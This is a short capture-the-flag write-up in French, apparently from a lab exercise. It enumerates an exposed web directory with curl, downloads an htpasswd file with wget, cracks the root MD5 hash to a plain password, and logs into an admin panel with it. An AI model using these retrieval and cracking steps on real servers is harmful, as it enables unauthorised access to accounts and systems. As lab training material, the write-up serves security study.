FLAG 1 – htpasswd Exposé

Lors de l’énumération du serveur, on trouve un répertoire accessible : http://192.168.1.47/whatever/

En listant son contenu : curl -s http://192.168.1.47/whatever/ | grep href

On voit : htpasswd

On télécharge le fichier : wget http://192.168.1.47/whatever/htpasswd

root:437394baff5aa33daa618be47b75cb49

<img width="629" height="570" alt="Image" src="https://github.com/user-attachments/assets/ae4276ab-8d4f-4352-b428-96e2309c64b5" />

Le hash ressemble à une empreinte MD5

437394baff5aa33daa618be47b75cb49 : qwerty123@

On obtient le mot de passe : qwerty123@

On se connecte à la page admin username : admin password : qwerty123@

<img width="726" height="739" alt="Image" src="https://github.com/user-attachments/assets/bb9d5e77-b527-4ecc-8c43-5618d3c42cb4" />
